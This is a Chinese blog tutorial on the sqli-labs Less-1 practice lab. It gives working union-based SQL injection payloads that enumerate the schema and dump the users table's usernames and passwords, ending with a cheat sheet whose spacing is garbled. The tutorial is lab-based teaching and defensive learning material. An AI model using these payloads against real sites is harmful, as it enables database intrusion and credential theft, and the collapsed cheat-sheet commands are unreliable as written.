news 2026/1/18 14:37:06

sqli-labs-master/Less-1靶场实战解析|包含AI整理

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
sqli-labs-master/Less-1靶场实战解析|包含AI整理

🧪 SQL注入入门:sqli-labs-master/Less-1靶场实战解析

嘿!看到你想学习渗透测试,这太棒了!SQL注入是渗透测试的基础技能之一,sqli-labs-master的Less-1就是个绝佳的入门靶场。我来给你详细讲解这个靶场的渗透过程和思路,帮你轻松入门!

🔍 靶场基本情况

Less-1是一个字符型SQL注入靶场,需要单引号闭合。页面要求我们输入id参数,通过SQL注入获取数据库信息。


🧪 渗透测试全过程(详细步骤)

1️⃣ 判断注入类型(基础判断)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=1

    • ✅ 页面正常显示(说明参数有效)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1'

    • ❌ 报错:You have an error in your SQL syntax...(单引号未闭合导致语法错误)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' --+

    • ✅ 页面正常显示(说明是字符型注入,可用--+注释掉后面的单引号)

💡判断技巧:字符型注入需要单引号闭合,数字型不需要。字符型注入用',数字型用AND 1=1测试。


2️⃣ 确定字段数量(关键步骤)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

    • ✅ 页面正常(说明至少有3列)
  • 输入http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+

    • ❌ 报错:Unknown column '4' in 'order clause'(说明只有3列)

💡为什么用order byorder by可以用来探测字段数量,通过逐步增加数字直到报错确定实际列数。


3️⃣ 确定回显位置(关键位置)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
    • ✅ 页面显示:Your Login name:2 Your Password:3
    • 🤔 结论:第2列显示username,第3列显示password

💡为什么用-1id=-1确保原查询无结果,这样联合查询的结果才会显示出来。如果用id=1,原查询有结果,联合查询的数据会被忽略。


4️⃣ 爆破数据库信息

  • 数据库名http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+

    • ✅ 结果:security(数据库名)
  • 数据库版本http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,version(),3 --+

    • ✅ 结果:10.2.26-MariaDB-log(数据库版本)
  • 当前用户http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,user(),3 --+

    • ✅ 结果:root@localhost(当前数据库用户)

5️⃣ 爆破表名(从information_schema获取)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    • ✅ 结果:emails,referers,uagents,users(数据库中的表名)

💡关键知识点information_schema是MySQL内置的系统数据库,包含所有元数据。


6️⃣ 爆破字段名(users表的字段)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
    • ✅ 结果:id,username,password(users表的字段名)

💡为什么用group_concat?因为SQL查询默认返回多行,group_concat将结果聚合为一行显示。


7️⃣ 爆破数据(获取用户名和密码)

  • 输入http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username,'~',password),3 from users --+
    • ✅ 结果:Dumb~Dumb,Angelina~I-kill-you,Dummy~p@ssword,...(所有用户名和密码)

💡 核心知识点总结

📌 SQL注入基础

  • 字符型注入:需要单引号闭合(如id=1'
  • 数字型注入:不需要单引号(如id=1 AND 1=1
  • 闭合技巧--+(MySQL中常用注释符,注释掉后面的单引号)

📌 SQL注入常用函数

函数作用示例
database()获取当前数据库名database()
version()获取数据库版本version()
user()获取当前数据库用户user()
group_concat()聚合查询结果为一行group_concat(username, '~', password)
SLEEP()使查询暂停用于时间盲注

📌 MySQL系统数据库

  • information_schema:MySQL内置的系统数据库,包含所有元数据
    • tables表:table_schema(数据库名)、table_name(表名)
    • columns表:column_name(字段名)

📌 联合查询技巧

  • union select:将两个查询结果合并
  • 关键技巧id=-1确保原查询无结果,让联合查询结果显示
  • 字段匹配:联合查询的列数必须与原查询匹配

💪 学习建议

  1. 先理解原理:不要只记命令,要理解为什么需要order byunion select
  2. 动手实践:在自己的环境中搭建sqli-labs靶场,亲自操作
  3. 逐步深入:Less-1是入门,Less-2是数字型注入,Less-3是报错注入,逐步挑战
  4. 安全第一:只在授权的靶场环境中练习,不要尝试攻击他人系统

🌟小提醒:SQL注入是基础技能,但实际渗透中还有更多类型(如盲注、时间盲注、宽字节注入等),建议先掌握Less-1,再挑战其他关卡。


📚 附:Less-1靶场完整SQL命令清单

-- 判断注入类型?id=1' --+ (字符型注入) -- 确定字段数 ?id=1'orderby3--+ (3列正常)?id=1' order by 4 --+ (4列报错) -- 确定回显位置 ?id=-1'unionselect1,2,3--+ (回显位置2、3)-- 爆库名?id=-1' union select 1,database(),3 --+ -- 爆表名 ?id=-1'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema='security'--+-- 爆字段名?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+ -- 爆数据 ?id=-1'unionselect1,group_concat(username,'~',password),3fromusers--+

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2025/12/27 1:54:07

力扣题解

目录 410.分割数组的最大值 4.寻找两个正序数组的中位数 51.N皇后 410.分割数组的最大值 这个题可以运用二分答案的算法来解题。定义一个左指针和一个右指针,令左指针等于数组的最大值,令右指针等于数组所有数之和。即最终的结果一定在他们之间。 lo…

作者头像 李华
网站建设 2026/1/9 7:13:58

毕设项目 基于大数据的K-means广告效果分析

基于大数据的K-means广告效果分析 项目运行效果: 毕业设计 基于大数据的K-means广告效果分析🧿 项目分享:见文末! 一、分析背景和目的 在大数据时代的背景下,广告主可以购买媒介变成直接购买用户,广告的精准投放对广告主、服务…

作者头像 李华
网站建设 2026/1/13 17:12:21

【计算机毕设选题推荐】基于Hadoop+Django的股市行情数据可视化分析平台 毕业设计 选题推荐 毕设选题 数据分析 机器学习

✍✍计算机毕设指导师** ⭐⭐个人介绍:自己非常喜欢研究技术问题!专业做Java、Python、小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目:有源码或者技术上的问题欢迎在评论区一起讨论交流! ⚡⚡有什么问题可以…

作者头像 李华
网站建设 2025/12/26 14:09:16

Unity学习笔记(十六)GUI总述

什么是GUI是即时模式游戏用户交互界面,在Unity中一般简称为GUI,是一个代码驱动的UI系统。GUI的主要作用1 作为程序员的调试工具,创建游戏内调试工具。2 为脚本组件创建自定义检视面板,创建新的编辑器窗口和工具扩展unity本身&…

作者头像 李华
网站建设 2025/12/26 19:44:07

ResCLIP

ResCLIP动机 现有方法(如SCLIP、NACLIP)通过将最后一层的标准交叉相关自注意力(C2SAC^2SAC2SA, Query-Key)替换为自相关自注意力(SCSA, Query-Query或Key-Key)来解决空间不变性问题 。然而,这些…

作者头像 李华
网站建设 2025/12/26 17:09:39

红黑树入门指南(C语言版)

红黑树入门指南(C语言版) 文章目录红黑树入门指南(C语言版)前言一、红黑树的基本概念1.1 核心定义1.2 关键特性二、红黑树的操作2.1 旋转(Rotation)左旋(Left Rotation)右旋&#xf…

作者头像 李华